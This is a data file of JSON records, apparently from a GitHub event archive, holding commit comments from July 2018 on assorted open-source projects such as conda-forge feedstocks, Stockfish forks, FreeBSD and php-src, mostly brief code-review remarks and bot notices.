{"id":"7995739433","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/advbumpversion-feedstock"},"payload":{"comment":{"id":29781198,"position":null,"line":null,"path":null,"commit_id":"3df23803bdb59631a0d5214cc87cc7c7038712e0","created_at":"2018-07-20T15:37:58Z","updated_at":"2018-07-20T15:37:58Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @kynan was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T15:37:58Z"}
{"id":"7995741030","type":"CommitCommentEvent","actor":{"login":"chemfy"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":29781204,"position":5,"line":23,"path":"database/migrations/2016_12_27_212631_make_asset_assigned_to_polymorphic.php","commit_id":"9dc226e3d68a3373162e4972930587fcbe954b93","created_at":"2018-07-20T15:38:16Z","updated_at":"2018-07-20T15:38:16Z","author_association":"CONTRIBUTOR","body":"Sure, I can take a look at this during the weekend"}},"created_at":"2018-07-20T15:38:16Z"}
{"id":"7995741948","type":"CommitCommentEvent","actor":{"login":"SuperQ"},"repo":{"name":"prometheus/node_exporter"},"payload":{"comment":{"id":29781207,"position":null,"line":null,"path":null,"commit_id":"ee1e1997bcd04c4a2b23380204a92029a85c6e56","created_at":"2018-07-20T15:38:27Z","updated_at":"2018-07-20T15:38:27Z","author_association":"MEMBER","body":"@kormotodor Can you file this as an issue, please include the output, and it would also help to include the output of `/usr/sbin/smartctl -A -d scsi /dev/sda`."}},"created_at":"2018-07-20T15:38:27Z"}
{"id":"7995744190","type":"CommitCommentEvent","actor":{"login":"jahirfiquitiva"},"repo":{"name":"rjharding/Blueprint"},"payload":{"comment":{"id":29781212,"position":null,"line":null,"path":null,"commit_id":"497f80ebb2548072395915885104132ce4384a39","created_at":"2018-07-20T15:38:54Z","updated_at":"2018-07-20T15:38:54Z","author_association":"NONE","body":"This change is not allowed. As per the [license terms](http://creativecommons.org/licenses/by-sa/4.0/legalcode), you must keep the attribution to the original author (me). Please rever this commit, or I will report the fork."}},"created_at":"2018-07-20T15:38:54Z"}
{"id":"7995745006","type":"CommitCommentEvent","actor":{"login":"magro"},"repo":{"name":"lightbend/paradox"},"payload":{"comment":{"id":29781214,"position":14,"line":56,"path":"plugin/src/main/scala/com/lightbend/paradox/sbt/ParadoxPlugin.scala","commit_id":"1222fe9cd71f8b7a6d3e62f8a64718b8c0abde26","created_at":"2018-07-20T15:39:04Z","updated_at":"2018-07-20T15:39:04Z","author_association":"NONE","body":"I have done this now. Unfortunately the test fails then. I've added the commit anyways, so that you can see what exactly I have changed. Maybe I've done anything wrong..."}},"created_at":"2018-07-20T15:39:04Z"}
{"id":"7995748219","type":"CommitCommentEvent","actor":{"login":"JuliaGofman"},"repo":{"name":"JuliaGofman/find_path_to_the_site"},"payload":{"comment":{"id":29781222,"position":null,"line":null,"path":null,"commit_id":"ce7fd1c0b0347fc8d2975427414c09d8a4a7babd","created_at":"2018-07-20T15:39:41Z","updated_at":"2018-07-20T15:39:41Z","author_association":"OWNER","body":"."}},"created_at":"2018-07-20T15:39:41Z"}
{"id":"7995750732","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyjnius-feedstock"},"payload":{"comment":{"id":29781228,"position":null,"line":null,"path":null,"commit_id":"3da37a8417fabfc275bc1b10e03d32a4ca0f3694","created_at":"2018-07-20T15:40:10Z","updated_at":"2018-07-20T15:40:10Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @hanslovsky was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T15:40:10Z"}
{"id":"7995755345","type":"CommitCommentEvent","actor":{"login":"jairajmatharu"},"repo":{"name":"gmorlov/gatsby-starter-docs"},"payload":{"comment":{"id":29781234,"position":19,"line":6,"path":"content/lessons/lesson_one.md","commit_id":"bc59191a08d76d1046f80ab7f067f7d690edcd8d","created_at":"2018-07-20T15:41:03Z","updated_at":"2018-07-20T15:41:03Z","author_association":"NONE","body":"this should work, the image exists in that dir \r\n"}},"created_at":"2018-07-20T15:41:03Z"}
{"id":"7995757224","type":"CommitCommentEvent","actor":{"login":"grant2258"},"repo":{"name":"libretro/mame2003-plus-libretro"},"payload":{"comment":{"id":29781236,"position":null,"line":null,"path":null,"commit_id":"d4c2b483a9def56c45c56f42091f36171636bd76","created_at":"2018-07-20T15:41:23Z","updated_at":"2018-07-20T15:41:23Z","author_association":"CONTRIBUTOR","body":"is worth a try before loosing it u would say"}},"created_at":"2018-07-20T15:41:23Z"}
{"id":"7995762914","type":"CommitCommentEvent","actor":{"login":"bitemyapp"},"repo":{"name":"snoyberg/cyrconv"},"payload":{"comment":{"id":29781255,"position":59,"line":101,"path":"src/main.rs","commit_id":"b35fff4bb9bf546aec7d35ef5325ef0a15f961c2","created_at":"2018-07-20T15:42:26Z","updated_at":"2018-07-20T15:42:26Z","author_association":"NONE","body":"Your non-Some discriminant doesn't return unit a la `None => (),`\r\n\r\nso I'd say not using `if let Some` is fine in this case. I mostly use `if let Some` for \"if we have a val, emit an effect.\""}},"created_at":"2018-07-20T15:42:26Z"}
{"id":"7995764710","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-drag-n-bar"},"payload":{"comment":{"id":29781258,"position":5,"line":498,"path":"scripts/drag-n-bar.js","commit_id":"27abef6d855290cfcc86ae2d08d88f3741693ade","created_at":"2018-07-20T15:42:47Z","updated_at":"2018-07-20T15:42:47Z","author_association":"MEMBER","body":"@otacke I think you might get multiple elements with the same `id=` here when having nested content types."}},"created_at":"2018-07-20T15:42:47Z"}
{"id":"7995765963","type":"CommitCommentEvent","actor":{"login":"alexpott"},"repo":{"name":"drupal/drupal"},"payload":{"comment":{"id":29781262,"position":null,"line":null,"path":null,"commit_id":"a7fdfb64693d00bd7e094ccda45c3e58581b8bbe","created_at":"2018-07-20T15:43:01Z","updated_at":"2018-07-20T15:43:01Z","author_association":"CONTRIBUTOR","body":"@radwankakar in the example you've given http://www.google.com?news and http://www.google.com?news= I'm not sure what's broken. Can you be more explicit?"}},"created_at":"2018-07-20T15:43:01Z"}
{"id":"7995767066","type":"CommitCommentEvent","actor":{"login":"abulshariff"},"repo":{"name":"colaberry/DSin100days"},"payload":{"comment":{"id":29781265,"position":null,"line":null,"path":null,"commit_id":"0bbc25e0c4692c398c33a79eb429adaa3b410637","created_at":"2018-07-20T15:43:15Z","updated_at":"2018-07-20T15:43:15Z","author_association":"COLLABORATOR","body":"Hello @pawan-nandakishore and @vsathwikm,\r\nI have added an Exercise section, for the people who would be taking this course, I hope this section helps in understanding it better. \r\nSo, @pawan-nandakishore in \r\nabul1.png - You said to explain it further about curves and their behavior. I was under the impression that this is an introductory section to, and keeping that in mind I wanted to keep the language and explanation to a point where students/users can understand what I am doing at that moment. \r\nabul5.png - I wasn't really sure what you trying to explain here\r\nabul6.png - Can you provide a solid explanation, as what I was missing ?\r\n\r\nAnd @vsathwikm, I hope I am tagging the right person here.\r\nAlso I have included some more side headings, please let me know what more I can add in terms of exercises and information and code. \r\nWhen you say some other functions can you give me example, I am just confused are talking about examples that can implemented just for sklearn or for both. If you can give me an example I can follow that would be help thank you \r\n"}},"created_at":"2018-07-20T15:43:15Z"}
{"id":"7995770617","type":"CommitCommentEvent","actor":{"login":"zaaraameera2014"},"repo":{"name":"SubZero7748/android_kernel_samsung_grandppltedx"},"payload":{"comment":{"id":29781271,"position":null,"line":null,"path":null,"commit_id":"ba921ffc472d6ea382af437710e8e86ba0e39637","created_at":"2018-07-20T15:43:55Z","updated_at":"2018-07-20T15:43:55Z","author_association":"NONE","body":"Siallah"}},"created_at":"2018-07-20T15:43:55Z"}
{"id":"7995772841","type":"CommitCommentEvent","actor":{"login":"felcaetano"},"repo":{"name":"paguz/RPi-RFID"},"payload":{"comment":{"id":29781272,"position":null,"line":null,"path":null,"commit_id":"fffbcd467c68002e3eb057f819c0c909e68d7883","created_at":"2018-07-20T15:44:22Z","updated_at":"2018-07-20T15:44:22Z","author_association":"NONE","body":"In my code it's declaration is \"int8_t\" here, don't know why tho. \r\nint8_t seems to be signed, so I don't think that's a problem."}},"created_at":"2018-07-20T15:44:22Z"}
{"id":"7995773500","type":"CommitCommentEvent","actor":{"login":"MartinBenninger"},"repo":{"name":"MartinBenninger/test-rtc-git-connector"},"payload":{"comment":{"id":29781276,"position":null,"line":null,"path":null,"commit_id":"f54d89fb5b811ee129504f88fe339df0b26581c1","created_at":"2018-07-20T15:44:30Z","updated_at":"2018-07-20T15:44:30Z","author_association":"OWNER","body":"This commit was linked by [RTC Work Item 52](https://localhost:7443/jazz/resource/itemName/com.ibm.team.workitem.WorkItem/52) on behalf of ADMIN"}},"created_at":"2018-07-20T15:44:30Z"}
{"id":"7995775770","type":"CommitCommentEvent","actor":{"login":"markfeathers"},"repo":{"name":"embeddedarm/linux-3.10.17-imx6"},"payload":{"comment":{"id":29781282,"position":4,"line":3,"path":"drivers/net/wireless/atmel/wilc3000/Kconfig","commit_id":"e43e3567cc1f0cf373abc40c60dd144bbc92df2d","created_at":"2018-07-20T15:44:58Z","updated_at":"2018-07-20T15:44:58Z","author_association":"CONTRIBUTOR","body":"Our hardware uses GPIO off of an I2C bus for the control signals.  If this driver were compiled in it would need to support deferring until those GPIO are available, but due to how this driver's init is structured that is not a trivial change.  Eg, the spi device probe should return -EPROBE_DEFER.  If this driver is always loaded as a module then the driver doesn't need to deal with defers."}},"created_at":"2018-07-20T15:44:58Z"}
{"id":"7995776117","type":"CommitCommentEvent","actor":{"login":"damarlas"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29781285,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-20T15:45:02Z","updated_at":"2018-07-20T15:45:02Z","author_association":"NONE","body":"Hi Guys,\r\nplease help me! I have read all your comments about this error while Update-Database,\r\n![capture](https://user-images.githubusercontent.com/7737774/43011736-9cd0c594-8c44-11e8-9a8e-d04ff08df7f4.PNG)\r\n"}},"created_at":"2018-07-20T15:45:02Z"}
{"id":"7995784545","type":"CommitCommentEvent","actor":{"login":"MarceloFCandido"},"repo":{"name":"MarceloFCandido/PIC02"},"payload":{"comment":{"id":29781302,"position":null,"line":null,"path":null,"commit_id":"9c254a2b0b6776ded8d07e0e3273aacc14dd50b4","created_at":"2018-07-20T15:46:41Z","updated_at":"2018-07-20T15:46:41Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Testar os cálculos](https://trello.com/c/oDl29aHX/20-testar-os-c%C3%A1lculos)"}},"created_at":"2018-07-20T15:46:41Z"}
{"id":"7995784570","type":"CommitCommentEvent","actor":{"login":"MarceloFCandido"},"repo":{"name":"MarceloFCandido/PIC02"},"payload":{"comment":{"id":29781303,"position":null,"line":null,"path":null,"commit_id":"9c254a2b0b6776ded8d07e0e3273aacc14dd50b4","created_at":"2018-07-20T15:46:41Z","updated_at":"2018-07-20T15:46:41Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Testar os cálculos](https://trello.com/c/oDl29aHX/20-testar-os-c%C3%A1lculos)"}},"created_at":"2018-07-20T15:46:41Z"}
{"id":"7995784738","type":"CommitCommentEvent","actor":{"login":"naga95"},"repo":{"name":"naga95/Active_particles-LAMMPS"},"payload":{"comment":{"id":29781304,"position":null,"line":null,"path":null,"commit_id":"83b9596b4fa85fefbfdd1dcb84fd5179de9e581c","created_at":"2018-07-20T15:46:43Z","updated_at":"2018-07-20T15:46:43Z","author_association":"OWNER","body":"LAMMPS currently doesn't support active particles. This was my attempt(probably a hasty one.) to edit the core code to make it possible. The system in my case was restricted to 2d. Hence, I used the 3rd dimension to store the value of angle and all the differences in code are to implement that. My suggestion would be to try and follow this thread on LAMMPS forum https://lammps.sandia.gov/threads/msg65739.htm. l would highly suggest you to join the forum. "}},"created_at":"2018-07-20T15:46:43Z"}
{"id":"7995785577","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29781305,"position":null,"line":null,"path":null,"commit_id":"b2fdff5bdfc8408b8037a15bdf8dd2c567f92d45","created_at":"2018-07-20T15:46:53Z","updated_at":"2018-07-20T15:46:53Z","author_association":"OWNER","body":"Yes, I think so, I'm just keen to make sure my tests aren't a mess because they are currently passing for the wrong reasons and it's not like I can avoid writing proper tests for the remainder of the work to be done :-)"}},"created_at":"2018-07-20T15:46:53Z"}
{"id":"7995790524","type":"CommitCommentEvent","actor":{"login":"markfeathers"},"repo":{"name":"embeddedarm/linux-3.10.17-imx6"},"payload":{"comment":{"id":29781310,"position":null,"line":null,"path":null,"commit_id":"4490c20658c9a591151d089b47c1c1a8c2c7d429","created_at":"2018-07-20T15:47:52Z","updated_at":"2018-07-20T15:47:52Z","author_association":"CONTRIBUTOR","body":"It looks like you are correct, but we only use this driver with SPI.  If we switch to using it from sdio we will pull down the latest driver which hopefully at that time would have this fixed.  This driver is under active development still by Microchip:\r\nhttps://github.com/linux4wilc/driver/commits/dev"}},"created_at":"2018-07-20T15:47:52Z"}
{"id":"7995794605","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29781317,"position":null,"line":null,"path":null,"commit_id":"d1dbfe1d22a3abffb74d560311515cd4809dec67","created_at":"2018-07-20T15:48:38Z","updated_at":"2018-07-20T15:48:38Z","author_association":"OWNER","body":"Created multidev environment [msgu#pr-1](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-msgu.pantheonsite.io/)"}},"created_at":"2018-07-20T15:48:38Z"}
{"id":"7995795431","type":"CommitCommentEvent","actor":{"login":"PsyMan47"},"repo":{"name":"albertoduqe/msm8996-common"},"payload":{"comment":{"id":29781318,"position":null,"line":null,"path":null,"commit_id":"c22c68a53fc7c9680aa25c2809005ce6320efee6","created_at":"2018-07-20T15:48:47Z","updated_at":"2018-07-20T15:48:47Z","author_association":"NONE","body":"LoL"}},"created_at":"2018-07-20T15:48:47Z"}
{"id":"7995805070","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29781334,"position":14,"line":14,"path":"stand/efi/loader/multiboot2_tramp.S","commit_id":"915690cf3b01cbb7ec99822a2139128295d0709e","created_at":"2018-07-20T15:50:39Z","updated_at":"2018-07-20T15:50:39Z","author_association":"NONE","body":"AFAICT you can call efi_copy_finish before jumping into multiboot2_tramp, thus removing a parameter to the trampoline call."}},"created_at":"2018-07-20T15:50:39Z"}
{"id":"7995809595","type":"CommitCommentEvent","actor":{"login":"Beneboe"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29781340,"position":null,"line":null,"path":null,"commit_id":"aeb326640a99f6c68b175e9aff3daf0818e9e916","created_at":"2018-07-20T15:51:32Z","updated_at":"2018-07-20T15:51:32Z","author_association":"COLLABORATOR","body":"You're right. I forget to check for the `max-age`  directive in the `Strict-Transport-Security` header. Fixed it in e021a382674d9a1fca4b0610d0fb7463c9fe210a."}},"created_at":"2018-07-20T15:51:32Z"}
{"id":"7995813576","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29781349,"position":3,"line":13,"path":"pkgs/build-support/bintools-wrapper/setup-hook.sh","commit_id":"110b5e0b6a8db0008c5698bf6aea986b0af0df6b","created_at":"2018-07-20T15:52:19Z","updated_at":"2018-07-20T15:52:19Z","author_association":"NONE","body":"Ah, but you can check for existence of anything starting with `lib` to make it 100% foolproof but still not add the GHC libraries since they only have a `$out/lib/ghc-8.4.3/`! So:\r\n````\r\nif [ -z \"$(find \"$1\" -name 'lib*' -printf nonempty -quit )\" ]; return; fi\r\n````"}},"created_at":"2018-07-20T15:52:19Z"}
{"id":"7995817506","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29781358,"position":5,"line":493,"path":"stand/efi/loader/bootinfo.c","commit_id":"0b6db0d65837d0fa15feeef27aa49b1c9b25cdfd","created_at":"2018-07-20T15:53:02Z","updated_at":"2018-07-20T15:53:02Z","author_association":"NONE","body":"You know you need to add another parameter to bi_load and propagate it to bi_load_efi_data?"}},"created_at":"2018-07-20T15:53:02Z"}
{"id":"7995823833","type":"CommitCommentEvent","actor":{"login":"annemarie35"},"repo":{"name":"betagouv/pass-culture-browser"},"payload":{"comment":{"id":29781371,"position":17,"line":17,"path":"testcafe/signup.js","commit_id":"4ba26a2a09100d9b95fe55a323fcb8c0b1f932b0","created_at":"2018-07-20T15:54:16Z","updated_at":"2018-07-20T15:54:16Z","author_association":"COLLABORATOR","body":"to remove ^^"}},"created_at":"2018-07-20T15:54:16Z"}
{"id":"7995828152","type":"CommitCommentEvent","actor":{"login":"Zunairbabu"},"repo":{"name":"Zunairbabu/helllow"},"payload":{"comment":{"id":29781381,"position":null,"line":null,"path":null,"commit_id":"937f4db9b004a33e1800d765b618c99bdcf0a1a5","created_at":"2018-07-20T15:55:06Z","updated_at":"2018-07-20T15:55:06Z","author_association":"OWNER","body":"Please give the feed back about this"}},"created_at":"2018-07-20T15:55:06Z"}
{"id":"7995830534","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29781385,"position":null,"line":null,"path":null,"commit_id":"ee561ff2a2ad6783c3f54092264ca2c622cf88f6","created_at":"2018-07-20T15:55:32Z","updated_at":"2018-07-20T15:55:32Z","author_association":"MEMBER","body":"@bukka Imho the length return value on this function doesn't make sense, especially as it includes the null bytes in the first case, but not in the other two. Maybe it should just be a SUCCESS/FAILURE function?"}},"created_at":"2018-07-20T15:55:32Z"}
{"id":"7995830660","type":"CommitCommentEvent","actor":{"login":"Zunairbabu"},"repo":{"name":"Zunairbabu/helllow"},"payload":{"comment":{"id":29781386,"position":null,"line":null,"path":null,"commit_id":"9575239c32270b2618997066e1846594447e15ff","created_at":"2018-07-20T15:55:34Z","updated_at":"2018-07-20T15:55:34Z","author_association":"OWNER","body":"Please give the feed back about this"}},"created_at":"2018-07-20T15:55:34Z"}
{"id":"7995831928","type":"CommitCommentEvent","actor":{"login":"mser7"},"repo":{"name":"FossilsArcheologyRevival/FossilsArcheologyRevival"},"payload":{"comment":{"id":29781391,"position":null,"line":null,"path":null,"commit_id":"a924d2a87ab76f3899650cb89212886352bcda82","created_at":"2018-07-20T15:55:48Z","updated_at":"2018-07-20T15:55:48Z","author_association":"NONE","body":"Megaloceros"}},"created_at":"2018-07-20T15:55:48Z"}
{"id":"7995836029","type":"CommitCommentEvent","actor":{"login":"Zunairbabu"},"repo":{"name":"Zunairbabu/helllow"},"payload":{"comment":{"id":29781398,"position":null,"line":null,"path":null,"commit_id":"6e9f5fd094dd871f44b4126e808333282daa027c","created_at":"2018-07-20T15:56:34Z","updated_at":"2018-07-20T15:56:34Z","author_association":"OWNER","body":"Please give the feed back about this"}},"created_at":"2018-07-20T15:56:34Z"}
{"id":"7995840620","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29781407,"position":null,"line":null,"path":null,"commit_id":"c04feb04ae5f8c0b092eab6a15351fa52313b03e","created_at":"2018-07-20T15:57:25Z","updated_at":"2018-07-20T15:57:25Z","author_association":"OWNER","body":"Collision 23~25"}},"created_at":"2018-07-20T15:57:25Z"}
{"id":"7995843342","type":"CommitCommentEvent","actor":{"login":"ahodges9"},"repo":{"name":"ahodges9/LedFx"},"payload":{"comment":{"id":29781411,"position":null,"line":null,"path":null,"commit_id":"a805ba6f8c89105e939f87fb350aa5a65e823494","created_at":"2018-07-20T15:57:56Z","updated_at":"2018-07-20T15:57:56Z","author_association":"OWNER","body":"#1 marking win32 library as windows only to fix Linux install"}},"created_at":"2018-07-20T15:57:56Z"}
{"id":"7995846472","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29781416,"position":null,"line":null,"path":null,"commit_id":"267381f7511040f78eb816e4ebfc414894806954","created_at":"2018-07-20T15:58:33Z","updated_at":"2018-07-20T15:58:33Z","author_association":"NONE","body":"sorry to bother you, but maybe you should continue some tuning on a lot of games and LTC? Seems like you have good luck in making them elo gainers and with 2500+ cores wasted resources are not problematic really."}},"created_at":"2018-07-20T15:58:33Z"}
{"id":"7995847750","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29781420,"position":null,"line":null,"path":null,"commit_id":"f6adc2ada4390b41ab37616f449846d4dd8c7a6a","created_at":"2018-07-20T15:58:47Z","updated_at":"2018-07-20T15:58:47Z","author_association":"NONE","body":"Does this even do anything when you run with 1 thread?"}},"created_at":"2018-07-20T15:58:47Z"}
{"id":"7995855103","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29781427,"position":null,"line":null,"path":null,"commit_id":"cd2d9088b551aae607bb5dc5254859a2cb006295","created_at":"2018-07-20T16:00:11Z","updated_at":"2018-07-20T16:00:11Z","author_association":"NONE","body":"I think you forgot to test using more than 1 thread."}},"created_at":"2018-07-20T16:00:11Z"}
{"id":"7995856253","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29781432,"position":null,"line":null,"path":null,"commit_id":"f6adc2ada4390b41ab37616f449846d4dd8c7a6a","created_at":"2018-07-20T16:00:21Z","updated_at":"2018-07-20T16:00:21Z","author_association":"OWNER","body":"Doh. . probably not.  I've never changed the # of threads before.  Should I\njust change it to 4 or something?\n\nOn Fri, Jul 20, 2018 at 9:58 AM, Andrew Grant <notifications@github.com>\nwrote:\n\n> Does this even do anything when you run with 1 thread?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/f6adc2ada4390b41ab37616f449846d4dd8c7a6a#commitcomment-29781420>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSCnOseObAh1sKfTsExuSzviqR1_qks5uIf44gaJpZM4VYRLZ>\n> .\n>\n\n\n\n-- \nMichael T. Whiteley\nmobile: 801.707.6886\n"}},"created_at":"2018-07-20T16:00:21Z"}
{"id":"7995857279","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29781437,"position":null,"line":null,"path":null,"commit_id":"f6adc2ada4390b41ab37616f449846d4dd8c7a6a","created_at":"2018-07-20T16:00:32Z","updated_at":"2018-07-20T16:00:32Z","author_association":"NONE","body":"Andy has right. This could makes only any difference in multi threaded search"}},"created_at":"2018-07-20T16:00:32Z"}
{"id":"7995858938","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29781442,"position":12,"line":30,"path":"assembl/alembic/versions/7bf35c9261d9_delete_extra_fields_for_deleted_users.py","commit_id":"a9b5d3abbc467333343d43ab89685860fffc8a06","created_at":"2018-07-20T16:00:52Z","updated_at":"2018-07-20T16:00:52Z","author_association":"CONTRIBUTOR","body":"why don't you do \r\n```\r\nfields = db.query(m.ProfileField).join(m.User).filter(m.User.is_deleted==True).all()\r\nfor field in fields:\r\n    db.delete(field)\r\n```\r\ndirectly?"}},"created_at":"2018-07-20T16:00:52Z"}
{"id":"7995859293","type":"CommitCommentEvent","actor":{"login":"jpfaw"},"repo":{"name":"jpfaw/Proxy-Re-Encryption"},"payload":{"comment":{"id":29781444,"position":244,"line":195,"path":"proxy.c","commit_id":"d7cda89ba3cc27f0f8a3193434a87056ed48464a","created_at":"2018-07-20T16:00:55Z","updated_at":"2018-07-20T16:00:55Z","author_association":"OWNER","body":"i<12?\r\n上の分割部分に統合していい"}},"created_at":"2018-07-20T16:00:55Z"}
{"id":"7995861240","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29781446,"position":null,"line":null,"path":null,"commit_id":"e17266cba39a9a4fe68cfcb5ff574472db47fd3e","created_at":"2018-07-20T16:01:17Z","updated_at":"2018-07-20T16:01:17Z","author_association":"NONE","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2018-07-20T16:01:17Z"}
{"id":"7995862594","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29781448,"position":null,"line":null,"path":null,"commit_id":"f6adc2ada4390b41ab37616f449846d4dd8c7a6a","created_at":"2018-07-20T16:01:32Z","updated_at":"2018-07-20T16:01:32Z","author_association":"NONE","body":"@protonspring \r\nI would test with more threads. This is a setting that seems common and i use two:\r\nTC 5+0.05 Hash=16 Threads=8"}},"created_at":"2018-07-20T16:01:32Z"}
{"id":"7995865273","type":"CommitCommentEvent","actor":{"login":"athre0z"},"repo":{"name":"KosBeg/disrusm"},"payload":{"comment":{"id":29781454,"position":null,"line":null,"path":null,"commit_id":"751a9f10f402c274122d10311d1d0bf8e9082f7c","created_at":"2018-07-20T16:02:04Z","updated_at":"2018-07-20T16:02:04Z","author_association":"NONE","body":"Oh shi-, competition! Just stumbled across this due to the keyword.\r\n\r\nYou might want to enable [`ZYDIS_DECODER_MODE_MINIMAL `](https://zyantific.com/doc/zydis/_decoder_8h.html#ae9f5091b036aedfda79c3d8cc18eef68a5e62f5ef7db9c55cb2550cc8c66bd76e) when comparing for length-disassembly specifically (using [`Decoder::enable_mode`](https://github.com/zyantific/zydis-rs/blob/master/src/decoder.rs#L27)). It speeds up the decoding process pretty significantly. Also, in our defense, there are quite a lot of things like segment prefixes and other sanity checks "}},"created_at":"2018-07-20T16:02:04Z"}
{"id":"7995865430","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29781455,"position":21,"line":21,"path":"otus-participant/src/main/java/org/ccem/otus/participant/service/ParticipantService.java","commit_id":"b52a8bd8a1c6d4713cd8519d6017570e69236eae","created_at":"2018-07-20T16:02:06Z","updated_at":"2018-07-20T16:02:06Z","author_association":"MEMBER","body":"Removida"}},"created_at":"2018-07-20T16:02:06Z"}
{"id":"7995866336","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29781456,"position":38,"line":69,"path":"otus-rest/src/main/java/br/org/otus/participant/ParticipantResource.java","commit_id":"b52a8bd8a1c6d4713cd8519d6017570e69236eae","created_at":"2018-07-20T16:02:16Z","updated_at":"2018-07-20T16:02:16Z","author_association":"MEMBER","body":"Refatorado"}},"created_at":"2018-07-20T16:02:16Z"}
{"id":"7995871745","type":"CommitCommentEvent","actor":{"login":"joshmgrant"},"repo":{"name":"watir/nerodia"},"payload":{"comment":{"id":29781461,"position":null,"line":null,"path":null,"commit_id":"2a7614c39998be1824d32737406892276d8638f5","created_at":"2018-07-20T16:03:20Z","updated_at":"2018-07-20T16:03:20Z","author_association":"CONTRIBUTOR","body":"There are [examples](https://github.com/watir/nerodia/tree/master/examples) of some basic code snippets. You can replace `br = Browser(browser='firefox')` with `br = Browser(browser='ie')` to start an Internet Explorer session.  "}},"created_at":"2018-07-20T16:03:20Z"}
{"id":"7995879854","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29781477,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-20T16:04:59Z","updated_at":"2018-07-20T16:04:59Z","author_association":"COLLABORATOR","body":"> And I want to ask that is there any method to disable the generation of docs in the Makefile? Since every time I use make to build, it doesn't know how to treat *.1 files.\r\n\r\n`NOMAN= # defined`\r\n\r\n> Yes, it is more efficient, thanks for the advice! I've updated the implementation.\r\n\r\nPerfect. It's fine to keep it as is for comparison between black-box fuzzing and proper fuzzing (I miss the right term).\r\n\r\n> What's more, it seems that the first bug has appeared even without any sanitizer. Please try this to reproduce it: https://github.com/plusun/src/tree/gsoc2018/tests/fuzz/regex/libc/regexec/bug\r\n\r\nI was looking at it, and I think that we shall consult Christos @zoulasc whether this is expected or not."}},"created_at":"2018-07-20T16:04:59Z"}
